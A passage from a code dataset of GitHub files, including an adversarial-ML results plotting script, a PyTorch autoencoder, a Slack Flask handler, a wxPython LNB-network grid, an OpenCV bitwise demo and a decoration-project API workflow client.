'./result/simrank/graph_{}.txt'.format(idx) \n with open(filename, 'w+') as f:\n pp = PrettyPrinter(indent=4, stream=f)\n f.write('\\nGraph {}\\n'.format(idx))\n s, i = simrank(graph)\n f.write('Run {} iterations \\nSimRank:\\n'.format(i))\n pp.pprint(s)\n print('(simrank) graph_{}.txt saved'.format(idx))\n\n print('end')\n","repo_name":"klin0816/data_mining_project3","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11488549154","text":"# %% [markdown]\n# # Dependencies\n\n# %%\n\nimport argparse\nimport logging\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport yaml\n\n\nlogger = logging.getLogger(__name__)\nsns.set_theme(style=\"whitegrid\")\nsns.set_context(\"paper\", font_scale=1.5)\n\n\ndef cat_plot(\n data,\n x,\n y,\n hue,\n kind,\n titles,\n xlabels,\n ylabels,\n legend_title,\n file,\n set={},\n **kwargs,\n):\n plt.gcf().clear()\n graph = sns.catplot(data=data, x=x, y=y, hue=hue, kind=kind, **kwargs)\n graph.set_xlabels(xlabels)\n graph.set_ylabels(ylabels)\n graph.set_titles(titles)\n graph.legend.set_title(title=legend_title)\n graph.set(**set)\n graph.savefig(FOLDER / file)\n plt.gcf().clear()\n logger.info(f\"Saved graph to {FOLDER / file}\")\n\n\ndef line_plot(\n data,\n x,\n y,\n hue,\n xlabel,\n ylabel,\n title,\n file,\n y_scale=None,\n x_scale=None,\n legend={},\n control=None,\n control_color=None,\n):\n plt.gcf().clear()\n graph = sns.lineplot(data=data, x=x, y=y, hue=hue, style=control)\n if control is not None:\n assert control_color is not None, \"Please specify a control color\"\n graph.add_line(plt.axhline(y=control, color=control_color, linestyle=\"-\"))\n graph.set_xlabel(xlabel)\n graph.set_ylabel(ylabel)\n graph.set_title(title)\n graph.legend(**legend)\n if y_scale is not None:\n graph.set_yscale(y_scale)\n if x_scale is not None:\n graph.set_xscale(x_scale)\n graph.get_figure().tight_layout()\n graph.get_figure().savefig(FOLDER / file)\n plt.gcf().clear()\n return graph\n\n\ndef 
format_control_parameter(data, control_dict, min_max=True):\n    data.def_gen.fillna(\"Control\", inplace=True)\n    new_data = pd.DataFrame()\n    for _, row in data.iterrows():\n        if row.defence in [\"Control\", None, \"None\", \"none\", \"null\", np.nan]:\n            row[\"def_param\"] = np.nan\n            row[\"def_value\"] = np.nan\n        else:\n            param = control_dict[row.defence]\n            row[\"def_param\"] = param.split(\".\")[-1]\n            value = row[param]\n            row[\"def_value\"] = value\n        if row.attack in [\"Control\", None, \"None\", \"none\", \"null\", np.nan]:\n            row[\"atk_param\"] = np.nan\n            row[\"atk_value\"] = np.nan\n        else:\n            param = control_dict[row.attack]\n            row[\"atk_param\"] = param.split(\".\")[-1]\n            value = row[param]\n            row[\"atk_value\"] = value\n        new_data = pd.concat([new_data, row], axis=1)\n    data = new_data.T\n    data.def_value.fillna(0, inplace=True)\n    del new_data\n\n    if min_max is True:\n        defs = data.def_gen.unique()\n        atks = data.atk_gen.unique()\n        # Min-max scaling of control parameters\n        for def_ in defs:\n            max_ = data[data.def_gen == def_].def_value.max()\n            min_ = data[data.def_gen == def_].def_value.min()\n            scaled_value = (data[data.def_gen == def_].def_value - min_) / (max_ - min_)\n            data.loc[data.def_gen == def_, \"def_value\"] = scaled_value\n\n        for atk in atks:\n            max_ = data[data.atk_gen == atk].atk_value.max()\n            min_ = data[data.atk_gen == atk].atk_value.min()\n            scaled_value = (data[data.atk_gen == atk].atk_value - min_) / (max_ - min_)\n            data.loc[data.atk_gen == atk, \"atk_value\"] = scaled_value\n    return data\n\n\ndef clean_data_for_plotting(data, def_gen_dict, atk_gen_dict, control_dict):\n    def_gen = data.def_gen.map(def_gen_dict)\n    data.def_gen = def_gen\n    atk_gen = data.atk_gen.map(atk_gen_dict)\n    data.atk_gen = atk_gen\n    # Drops poorly merged columns\n    data = data[data.columns.drop(list(data.filter(regex=\".1\")))]\n    # Replaces model names with short names\n    model_names = data[\"model.init.name\"]\n    # model_names = [x.get_text() for x in model_names]\n    model_names = [x.split(\".\")[-1] for x in model_names]\n    data[\"model_name\"] = model_names\n    # %%\n    # Replace data.sample.random_state with random_state\n    data[\"random_state\"] = data[\"data.sample.random_state\"].copy()\n    del data[\"data.sample.random_state\"]\n    data = format_control_parameter(data, control_dict, min_max=True)\n    # Calculates various failure rates\n    data[\"adv_failures_per_training_time\"] = (\n        data[\"train_time_per_sample\"] / (1 - data[\"adv_accuracy\"]) * 100\n    )\n    data[\"adv_failure_rate\"] = (1 - data[\"adv_accuracy\"]) * data[\n        \"adv_fit_time_per_sample\"\n    ]\n    data[\"failure_rate\"] = (1 - data[\"accuracy\"]) * data[\"predict_time_per_sample\"]\n    data[\"failures_per_training_time\"] = (\n        data[\"train_time_per_sample\"] / (1 - data[\"accuracy\"]) * 100\n    )\n    logger.info(f\"Saving data to {FOLDER / 'data.csv'}\")\n    data.to_csv(FOLDER / \"data.csv\")\n    return data\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        \"-p\",\n        \"--path\",\n        type=str,\n        help=\"Path to the plot folder\",\n        default=\"output/plots\",\n    )\n    parser.add_argument(\n        \"-f\",\n        \"--file\",\n        type=str,\n        help=\"Path to the results CSV file\",\n        default=\"output/reports/results.csv\",\n    )\n    parser.add_argument(\n        \"-t\",\n        \"--plotfiletype\",\n        type=str,\n        help=\"Filetype of the plots\",\n        default=\".pdf\",\n    )\n    parser.add_argument(\n        \"-v\",\n        \"--verbosity\",\n        default=\"INFO\",\n        help=\"Increase output verbosity\",\n    )\n    args = 
parser.parse_args()\n logging.basicConfig(level=args.verbosity)\n # %%\n assert Path(\n args.file,\n ).exists(), f\"File {args.file} does not exist. Please specify a valid file using the -f flag.\"\n csv_file = args.file\n data = pd.read_csv(csv_file)\n if \"Unnamed: 0\" in data.columns:\n data.drop(\"Unnamed: 0\", axis=1, inplace=True)\n\n FOLDER = Path(Path(), args.path)\n IMAGE_FILETYPE = (\n args.plotfiletype\n if args.plotfiletype.startswith(\".\")\n else f\".{args.plotfiletype}\"\n )\n if Path(FOLDER).exists():\n pass\n else:\n logger.info(f\"Creating folder {FOLDER}\")\n FOLDER.mkdir(parents=True, exist_ok=True)\n\n # Reads Config file\n with open(FOLDER / \"config/default.yaml\", \"r\") as f:\n big_dict = yaml.load(f, Loader=yaml.FullLoader)\n def_gen_dict = big_dict[\"defences\"]\n atk_gen_dict = big_dict[\"attacks\"]\n control_dict = big_dict[\"params\"]\n\n data = clean_data_for_plotting(data, def_gen_dict, atk_gen_dict, control_dict)\n # %%\n cat_plot_list = big_dict[\"cat_plot\"]\n i = 0\n for dict_ in cat_plot_list:\n i += 1\n logger.info(f\"Rendering graph {i}\")\n locals()[f\"graph{i}\"] = cat_plot(data, **dict_)\n # %%\n line_plot_list = big_dict[\"line_plot\"]\n for dict_ in line_plot_list:\n i += 1\n logger.info(f\"Rendering graph {i}\")\n locals()[f\"graph{i}\"] = line_plot(data, **dict_)\n\n # %%\n graph14 = sns.scatterplot(\n data=data,\n x=\"train_time_per_sample\",\n y=\"adv_failure_rate\",\n hue=\"model_name\",\n )\n graph14.set_yscale(\"log\")\n graph14.set_xscale(\"log\")\n graph14.set_xlabel(\"Training Time\")\n graph14.set_ylabel(\"Adversarial Failure Rate\")\n graph14.legend(title=\"Model Name\")\n # graph6.legend(loc='center left', bbox_to_anchor=(1, 0.5), ncol=1)\n # graph6.legend(labels=[\"ResNet18\", \"Resnet34\", \"Resnet50\"])\n graph14.set_title(\"Adversarial Failure Rate vs Training Time\")\n # graph6.get_figure().tight_layout()\n file = f\"adv_failure_rate_vs_train_time{IMAGE_FILETYPE}\"\n graph14.get_figure().savefig(FOLDER / file)\n logger.info(f\"Rendering graph {i+1}\")\n logger.info(f\"Saved graph to {FOLDER / file}\")\n plt.gcf().clear()\n conf_path = Path(\"output/plots/config\")\n conf_path.mkdir(parents=True, exist_ok=True)\n conf_dict = {\n **vars(args),\n \"cat_plot\": cat_plot_list,\n \"line_plot\": line_plot_list,\n \"params\": control_dict,\n \"attacks\": atk_gen_dict,\n \"defences\": def_gen_dict,\n }\n with open(conf_path / \"default.yaml\", \"w\") as f:\n yaml.dump(conf_dict, f)\n","repo_name":"simplymathematics/deckard","sub_path":"examples/pytorch/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":8199,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"8759070790","text":"\"\"\"autoencoder.py\n\nAuthor(s): chofer, rkwitt (2018)\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport core.mynn as mynn\n\n\nclass DCGEncDec(nn.Module):\n \"\"\"\n Implementation of a convolutional autoencoder with a DCGAN-style\n encoder (disc. in DCGAN) and decoder. \n\n Args:\n filter_config: list \n Number of channels input to each conv. layer. The length of\n the list determines the number of layers. The filters in \n each layer are 3x3 spatially with a step-size of two.\n\n input_config: list\n List of input img. dimensions in the form channel x width x height.\n\n latent_config: dict\n Specification of the latent space geometry. 
\n\n        Keys: \n\n            n_branches: int \n                number of independent branches in the latent space - needs\n                to be a divisor of the dimensionality of the last conv. \n                layer when flattened.\n\n            out_features_branch: int\n                number of output features for each independent branch. \n\n        Example::\n            m = DCGEncDec(\n                filter_config = [3,16,32,64], \n                input_config = [3,32,32],\n                latent_config = {'n_branches': 16, 'out_features_branch': 10}\n            )\n        This creates an autoencoder for input images of size 3x32x32 with\n        3 input channels (obviously) and three conv. layers with 16,32 and\n        64 filters (each followed by leaky ReLU activations). The decoder \n        mirrors this architecture with convolutional transpose filters. \n\n        In the latent space, this model has 16 branches\n        that output 10 dimensional features. For decoding, these features\n        are concatenated. In this particular example, flattening the output \n        of the last conv. layer results in a 1024-dim. representation.\n    \"\"\"\n    def __init__(self, *ignore,\n                 filter_config=[3,16,32,64], \n                 input_config=[3,32,32], \n                 latent_config={'n_branches': 1, 'out_features_branch': 10}):\n        super().__init__()\n        \n        assert len(ignore) == 0, \"Keyword args only!\"\n\n        self.n_branches = latent_config['n_branches']\n        self.out_features_branch = latent_config['out_features_branch']\n        \n        assert(filter_config[0]==input_config[0])\n        \n        self.enc = []\n        for i in range(len(filter_config)-1):\n            self.enc.append(\n                nn.Conv2d(in_channels = filter_config[i], \n                          out_channels = filter_config[i+1], \n                          kernel_size = 3, \n                          stride = 2, \n                          padding = 1, \n                          bias = True)\n            )\n            \n            self.enc.append(nn.LeakyReLU())\n        \n        self.enc_conv = nn.Sequential(*self.enc)\n\n        # Compute the required size of the linear layer following the last conv. stage\n        enc_dim = torch.tensor(list(self.enc_conv(torch.randn(10,*input_config)).size()[1:]))\n        assert enc_dim.prod() % self.n_branches == 0\n        \n        # Make sure we have independent branches - this effectively multiplies the \n        # weight matrix of the linear layer by a mask which ensures this property.\n        self.enc_fc = mynn.IndependentBranchesLinear(\n            enc_dim.prod(), \n            self.out_features_branch,\n            self.n_branches\n        )\n        \n        # Create a linear view\n        self.enc = nn.Sequential(\n            self.enc_conv, \n            mynn.LinearView(),\n            self.enc_fc\n        )\n        \n        # Unfold the independent linear branches \n        self.dec_fc = mynn.IndependentBranchesLinear(\n            self.latent_dim, \n            int(enc_dim.prod()/self.n_branches), \n            self.n_branches\n        )\n        \n        self.dec_convt = []\n        self.dec_convt.append(mynn.View(tuple([-1] + list(enc_dim))))\n        \n        reversed_filter_config = list(reversed(filter_config))\n        for i in range(len(reversed_filter_config)-1):\n            self.dec_convt.append(\n                nn.ConvTranspose2d(\n                    in_channels = reversed_filter_config[i],\n                    out_channels = reversed_filter_config[i+1], \n                    kernel_size = 3,\n                    stride = 2, \n                    padding = 1, \n                    output_padding = 1)\n            )\n            self.dec_convt.append(nn.ReLU())\n\n        # remove last ReLU\n        self.dec_convt = self.dec_convt[:-1]\n        \n        # At the moment we do not use a Sigmoid output\n        self.dec_convt = nn.Sequential(*self.dec_convt)\n        self.dec = nn.Sequential(self.dec_fc,\n                                 self.dec_convt)\n        \n        \n    def forward(self, input):\n        z = self.enc(input)\n        x = self.dec(z)\n        return x,z\n    \n    @property\n    def latent_dim(self):\n        return self.n_branches*self.out_features_branch\n\n","repo_name":"c-hofer/COREL_icml2019","sub_path":"core/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} 
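A note on the record above: core.mynn.IndependentBranchesLinear is referenced but its implementation is not part of this dump, so the following is only a sketch of how such a layer could plausibly work, assuming it is an ordinary linear layer whose weight matrix is multiplied by a block-diagonal mask so each latent branch only sees its own slice of the flattened conv features. The class name BlockDiagonalLinear, the constructor signature and the masking strategy are illustrative assumptions, not the COREL authors' code:

import torch
import torch.nn as nn
import torch.nn.functional as F

class BlockDiagonalLinear(nn.Module):
    """Linear layer masked so that each of n_branches output groups
    only connects to its own contiguous slice of the input (assumed
    stand-in for mynn.IndependentBranchesLinear, which is not shown)."""

    def __init__(self, in_features, out_features_branch, n_branches):
        super().__init__()
        assert in_features % n_branches == 0  # mirrors the assert in the record
        self.linear = nn.Linear(in_features, out_features_branch * n_branches)
        in_branch = in_features // n_branches
        mask = torch.zeros(out_features_branch * n_branches, in_features)
        for b in range(n_branches):
            mask[b * out_features_branch:(b + 1) * out_features_branch,
                 b * in_branch:(b + 1) * in_branch] = 1.0
        # A buffer moves with .to(device) but is not a trainable parameter.
        self.register_buffer("mask", mask)

    def forward(self, x):
        # Re-applying the mask on every call keeps off-block weights at zero
        # even after optimizer updates, which is what keeps the branches independent.
        return F.linear(x, self.linear.weight * self.mask, self.linear.bias)

With filter_config=[3,16,32,64] and 32x32 inputs, the three stride-2 convolutions reduce the spatial size 32 -> 16 -> 8 -> 4, so the flattened encoder output is 64*4*4 = 1024 features; 16 branches of this kind would then each see a disjoint 64-dimensional input slice and emit 10 features, matching the 16x10 latent layout described in the docstring.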
+{"seq_id":"34906247308","text":"import json\nfrom http import HTTPStatus\nfrom threading import Thread\n\nfrom flask import request, current_app\n\nfrom src.blueprints.slack.SlackResource import SlackResource\nfrom src.models.slack.requests.SlackInteractiveComponentRequest import InteractiveComponentRequestSchema, \\\n SlackInteractiveComponentRequest\nfrom src.translators.SlackInteractiveComponentTranslator import SlackInteractiveComponentTranslator\n\n\nclass InteractiveComponentResource(SlackResource):\n\n @SlackResource.authenticate\n def post(self):\n \"\"\"Receive an interactive component (e.g. menu, dialog box) payload\"\"\"\n self.logger.info(f'Processing InteractiveComponent request: {request.__dict__}')\n payload = json.loads(request.form['payload'])\n interactive_component_request: SlackInteractiveComponentRequest = InteractiveComponentRequestSchema().load(\n payload).data\n translator = SlackInteractiveComponentTranslator(\n slack_interactive_component_request=interactive_component_request,\n slack_client_wrapper=current_app.slack_client_wrapper,\n strand_api_client_wrapper=current_app.strand_api_client_wrapper\n )\n Thread(target=translator.translate, daemon=True).start()\n if interactive_component_request.is_dialog:\n # Slack wants a different response for dialogs\n return {}, HTTPStatus.OK\n return None, HTTPStatus.NO_CONTENT\n","repo_name":"tadasant/strand-slack","sub_path":"src/blueprints/slack/InteractiveComponentResource.py","file_name":"InteractiveComponentResource.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14425222150","text":"import wx\nimport wx.grid\nimport sys\nimport os\nimport copy\nfrom collections import namedtuple, OrderedDict\nimport numbers\nimport datetime\nfrom dateutil import tz\nimport regex as re\n\nfrom neumodvb.util import setup, lastdot\nfrom neumodvb.util import dtdebug, dterror\nfrom neumodvb import neumodbutils\nfrom neumodvb.neumolist import NeumoTable, NeumoGridBase, IconRenderer, MyColLabelRenderer, GridPopup, screen_if_t\nfrom neumodvb.neumo_dialogs import ShowMessage, ShowOkCancel\nfrom neumodvb.util import find_parent_prop\nimport pydevdb\nimport pychdb\n\nclass lnbnetwork_screen_t(object):\n def __init__(self, parent):\n self.parent = parent\n\n @property\n def list_size(self):\n return len(self.parent.lnb.networks)\n\n def record_at_row(self, rowno):\n assert(rowno>=0)\n if rowno >= self.list_size:\n assert(rowno == self.list_size)\n assert rowno < self.list_size\n return self.parent.lnb.networks[rowno]\n\n def update(self, txn):\n return True\n\n def set_reference(self, rec):\n lnb = self.parent.lnb\n for i in range(len(lnb.networks)):\n if lnb.networks[i].sat_pos == rec.sat_pos:\n return i\n return -1\n\nclass LnbNetworkTable(NeumoTable):\n CD = NeumoTable.CD\n bool_fn = NeumoTable.bool_fn\n all_columns = \\\n [CD(key='sat_pos', label='LNB Pos.', basic=True, dfn= lambda x: pychdb.sat_pos_str(x[1]),\n sfn = lambda x: x[2].sat_pos_sfn(x[0], x[1])),\n CD(key='priority', label='priority', basic=False),\n CD(key='usals_pos', label='Usals pos.', basic=False, allow_others=True,\n dfn= lambda x: pychdb.sat_pos_str(x[1]), sfn = lambda x: x[2].usals_pos_sfn(x[0], x[1])),\n CD(key='diseqc12', label='diseqc 1.2', basic=False),\n CD(key='enabled', label='enabled', basic=False, dfn=bool_fn),\n CD(key='ref_mux', label='ref mux', basic=False, readonly= True, example=\"28.2E: nid=1234 tid=1234\")\n ]\n\n def __init__(self, parent, 
basic=False, *args, **kwds):\n        initial_sorted_column = 'sat_pos'\n        data_table= pydevdb.lnb_network\n        self.lnb_ = None\n        self.changed = False\n        super().__init__(*args, parent=parent, basic=basic, db_t=pydevdb, data_table = data_table,\n                         record_t=pydevdb.lnb_network.lnb_network,\n                         screen_getter = self.screen_getter,\n                         initial_sorted_column = initial_sorted_column,\n                         **kwds)\n    def sat_pos_sfn(self, record, val):\n        from neumodvb.util import parse_longitude\n        newval = parse_longitude(val)\n        record.sat_pos = newval\n        changed = pydevdb.lnb.add_or_edit_network(self.lnb, self.get_usals_location(), record)\n        if changed:\n            self.changed = True\n        return record\n\n    def usals_pos_sfn(self, record, val):\n        from neumodvb.util import parse_longitude\n        newval = parse_longitude(val)\n        record.usals_pos = newval\n        changed = pydevdb.lnb.add_or_edit_network(self.lnb, self.get_usals_location(), record)\n        if changed:\n            self.changed = True\n        return record\n\n    @property\n    def lnb(self):\n        if self.lnb_ is None:\n            self.lnb_ = find_parent_prop(self, 'lnb')\n        return self.lnb_\n\n    @property\n    def network(self):\n        if hasattr(self.parent, \"network\"):\n            return self.parent.network\n        return None\n\n    @network.setter\n    def network(self, val):\n        if hasattr(self.parent, \"network\"):\n            self.parent.network = val\n\n    def InitialRecord(self):\n        return self.network\n\n    def SetSat(self, sat):\n        if self.lnb is None:\n            return self.network\n        for network in self.lnb.networks:\n            if network.sat_pos == sat.sat_pos:\n                self.network = network\n        return self.network\n\n    def screen_getter(self, txn, sort_field):\n        \"\"\"\n        txn is not used; instead we use self.lnb\n        \"\"\"\n        self.screen = screen_if_t(lnbnetwork_screen_t(self), self.sort_order==2)\n\n    def matching_sat(self, sat_pos):\n        sats = wx.GetApp().get_sats()\n        for sat in sats:\n            if abs(sat.sat_pos - sat_pos) < 5:\n                return sat\n        return None\n\n    def get_usals_location(self):\n        receiver = wx.GetApp().receiver\n        opts = receiver.get_options()\n        return opts.usals_location\n\n    def __save_record__(self, txn, record):\n        dtdebug(f'NETWORKS: {len(self.lnb.networks)}')\n        changed = pydevdb.lnb.add_or_edit_network(self.lnb, self.get_usals_location(), record)\n        if changed:\n            self.changed = True\n\n        for n in self.lnb.networks:\n            if self.matching_sat(n.sat_pos) is None:\n                ss = pychdb.sat_pos_str(n.sat_pos)\n                add = ShowOkCancel(\"Add satellite?\", f\"No sat yet for position={ss}; add one?\")\n                if not add:\n                    return None\n                sat = pychdb.sat.sat()\n                sat.sat_pos = n.sat_pos\n                pychdb.put_record(txn, sat)\n        return record\n\n    def __delete_record__(self, txn, record):\n        for i in range(len(self.lnb.networks)):\n            if self.lnb.networks[i].sat_pos == record.sat_pos:\n                self.lnb.networks.erase(i)\n                self.changed = True\n                return\n        dtdebug(\"ERROR: cannot find record to delete\")\n        self.changed = True\n\n    def __new_record__(self):\n        ret=self.record_t()\n        return ret\n\nclass LnbNetworkGrid(NeumoGridBase):\n    def _add_accels(self, items):\n        accels=[]\n        for a in items:\n            randomId = wx.NewId()\n            accels.append([a[0], a[1], randomId])\n            self.Bind(wx.EVT_MENU, a[2], id=randomId)\n        accel_tbl = wx.AcceleratorTable(accels)\n        self.SetAcceleratorTable(accel_tbl)\n\n    def __init__(self, basic, readonly, *args, **kwds):\n        table = LnbNetworkTable(self, basic=basic)\n        super().__init__(basic, readonly, table, *args, **kwds)\n        self.sort_order = 0\n        self.sort_column = None\n        self.selected_row = None if self.table.GetNumberRows() == 0 else 0\n        #todo: these accelerators should be copied from neumomenu\n        self._add_accels([\n            (wx.ACCEL_CTRL, 
ord('D'), self.OnDelete),\n            (wx.ACCEL_CTRL, ord('N'), self.OnNew),\n            (wx.ACCEL_CTRL, ord('E'), self.OnEditMode)\n        ])\n        self.EnableEditing(self.app.frame.edit_mode)\n\n    def SetSat(self, sat):\n        self.network = self.table.SetSat(sat)\n\n    def OnDone(self, evt):\n        #@todo(). When a new record has been inserted and network has been changed, and then user clicks \"done\"\n        #this is not seen as a change, because the editor has not yet saved itself\n        self.table.SaveModified() #fake save\n        if self.table.changed:\n            if len(self.table.lnb.networks) ==0:\n                ShowMessage(title=_(\"Need at least one network per LNB\"),\n                            message=_(\"Each LNB needs at least one network. A default one has been added\"))\n        dtdebug(f\"OnDone called changed-{self.table.changed}\")\n\n    def OnKeyDown(self, evt):\n        \"\"\"\n        After editing, move cursor right\n        \"\"\"\n        keycode = evt.GetKeyCode()\n        if keycode == wx.WXK_RETURN and not evt.HasAnyModifiers():\n            self.MoveCursorRight(False)\n            evt.Skip(False)\n        else:\n            evt.Skip(True)\n\n    def CmdTune(self, evt):\n        row = self.GetGridCursorRow()\n        mux_key = self.screen.record_at_row(row).ref_mux\n        txn = self.db.wtxn()\n        mux = pychdb.dvbs_mux.find_by_key(txn, mux_key)\n        txn.abort()\n        del txn\n        mux_name= f\"{int(mux.frequency/1000)}{lastdot(mux.pol).replace('POL','')}\"\n        dtdebug(f'CmdTune requested for row={row}: PLAY mux={mux_name}')\n        self.table.SaveModified()\n        self.app.MuxTune(mux)\n\n    def OnNew(self, evt):\n        self.app.frame.SetEditMode(True)\n        self.EnableEditing(self.app.frame.edit_mode)\n        return super().OnNew(evt)\n\n    def OnEditMode(self, evt):\n        dtdebug(f'old_mode={self.app.frame.edit_mode}')\n        self.app.frame.ToggleEditMode()\n        self.EnableEditing(self.app.frame.edit_mode)\n\n    def handle_lnb_change(self, lnb, network):\n        self.table.GetRow.cache_clear()\n        self.OnRefresh(None, network)\n        if network is None:\n            self.network = self.table.screen.record_at_row(0)\n        else:\n            self.network = network\n\nclass BasicLnbNetworkGrid(LnbNetworkGrid):\n    def __init__(self, *args, **kwds):\n        basic = True\n        readonly = True\n        super().__init__(basic, readonly, *args, **kwds)\n","repo_name":"deeptho/neumodvb","sub_path":"gui/neumodvb/lnbnetworklist.py","file_name":"lnbnetworklist.py","file_ext":"py","file_size_in_byte":8758,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"10825948434","text":"import cv2\r\nimport numpy as np\r\n\r\n\r\nimg1 = np.zeros((324,324,3),np.uint8)\r\nimg1 = cv2.rectangle(img1,(200,0),(300,100),(255,255,255),-1)\r\nimg2 = cv2.imread('blackwhite.jpg')\r\n\r\n# bitAnd = cv2.bitwise_and(img2, img1)\r\n\r\n\r\n#comparing img1 and img2 in the output shows that black acts as False and white acts as True, so applying Boolean logic yields the third image\r\n#similarly we can do it for the OR, NOT and XOR\r\n\r\n\r\n#bitOR = cv2.bitwise_or(img2, img1)\r\n#bitNOT = cv2.bitwise_not(img2)\r\nbitXOR = cv2.bitwise_xor(img2, img1)\r\n\r\ncv2.imshow(\"img1\",img1)\r\ncv2.imshow(\"img2\",img2)\r\n# cv2.imshow(\"bitAnd\",bitAnd)\r\n# cv2.imshow('bitOr', bitOR)\r\ncv2.imshow('bitXOR', bitXOR)\r\n\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"Soham7021/Basic_Open_CV_Repo","sub_path":"11th bitwise operations.py","file_name":"11th bitwise operations.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10205916881","text":"# -*- coding:utf8 -*-\n\nimport 
time\nfrom common import sqlbase, dict\nfrom common.base import consoleLog, get_conf\nfrom common.datetimes import addDays\nfrom common.interface_wfl import myRequest, upLoadPhoto\nfrom common.dict import UserInfo, get_dict_value\nfrom isz.infoClass import DecorationProjectInfo\n\n\nclass Decoration(DecorationProjectInfo):\n \"\"\"装修工程\"\"\"\n uploadPhotoURL = 'http://decorate.ishangzu.com/isz_decoration/DecorationFileController/uploadPhoto' # 装修工程上传图片地址\n user = UserInfo.getConfigUser()\n\n def placeOrder(self):\n \"\"\"下单\"\"\"\n consoleLog(u'开始工程管理')\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/changeProgress/placeOrder'\n data = {\n 'place_order_dep': self.user.dep_id,\n 'place_order_reason': u'测试',\n 'place_order_uid': self.user.user_id,\n 'place_order_uname': self.user.user_name,\n 'place_order_date': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'predict_survey_date': '%s 09:00' % addDays(1),\n 'project_id': self.project_id\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'下单完成')\n return\n\n def dispatchOrder(self):\n \"\"\"派单\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/changeProgress/dispatchOrder'\n data = {\n 'construct_uid': '1610',\n 'construct_uname': u'徐经纬',\n 'dispach_remark': u'测试派单',\n 'project_id': self.project_id,\n 'supplier_id': '8A2152435FBAEFC3015FBAEFC3000000',\n 'supplier_uid': '8AB398CA5FBAF072015FBB26338A0002',\n 'predict_survey_date': '',\n 'supplier_name': u'测试专用硬装供应商',\n 'supplier_uname': u'测试专用硬装员工'\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'派单完成')\n return\n\n def acceptOrder(self):\n \"\"\"接单\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/changeProgress/acceptOrder'\n data = {\n 'project_id': self.project_id,\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'接单完成')\n return\n\n def survey(self, is_need_waterproofing='Y'):\n \"\"\"量房\"\"\"\n\n def score():\n \"\"\"测量\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/survey/score'\n data = {\n 'grade': '20',\n 'project_id': self.project_id,\n 'reform_way_fact': 'REFORM',\n 'score_remark': '',\n 'attachments': [{\n 'attach_type': 'TOILET',\n 'imgs': [{\n \"url\": None,\n \"img_id\": None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 0,\n 'type': 'TOILET'\n }]\n }, {\n 'attach_type': 'KITCHEN',\n 'imgs': [{\n \"url\": None,\n \"img_id\": None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 1,\n 'type': 'KITCHEN'\n }]\n }, {\n 'attach_type': 'LIVING_ROOM',\n 'imgs': [{\n 'url': None,\n 'img_id': None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 2,\n 'type': 'LIVING_ROOM'\n }]\n }, {\n 'attach_type': 'ROOM',\n 'imgs': [{\n \"url\": None,\n \"img_id\": None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 3,\n 'type': 'ROOM'\n }]\n }, {\n 'attach_type': 'OTHER',\n 'imgs': [{\n \"url\": None,\n \"img_id\": None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 4,\n 'type': 'OTHER'\n }]\n }]\n }\n for attachment in data['attachments']:\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='%s.png' % attachment['attach_type'])\n attachment['imgs'][0]['url'] = IMG.url\n attachment['imgs'][0]['img_id'] = IMG.id\n result = myRequest(url, data)\n if result:\n # consoleLog(u'测量完成')\n return\n\n def profee():\n \"\"\"物业交割\"\"\"\n url = 
'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/survey/profee'\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='PROPERTY_DELIVERY_ORDER.png')\n data = {\n 'air_switch': '',\n 'door_card': '',\n 'door_key': '',\n 'electricity_card': '',\n 'electricity_meter_num': '',\n 'electricity_meter_remain': '',\n 'gas_card': '',\n 'gas_meter_num': '',\n 'gas_meter_remain': '',\n 'project_id': str(self.project_id),\n 'water_card': '',\n 'water_card_remain': '',\n 'water_meter_num': '',\n 'attachments': [{\n 'attach_type': 'PROPERTY_DELIVERY_ORDER',\n 'imgs': [{\n \"url\": IMG.url,\n \"img_id\": IMG.id,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 0,\n 'type': ''\n }]\n }],\n 'resource': 'SURVEY'\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'物业交割完成')\n return\n\n def closed():\n \"\"\"闭水\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/survey/closed'\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='SCENE.png')\n data = {\n 'air_switch': None,\n 'attachments': [{\n 'attach_type': 'SCENE',\n 'imgs': [{\n \"url\": IMG.url,\n \"img_id\": IMG.id,\n 'create_name': '',\n 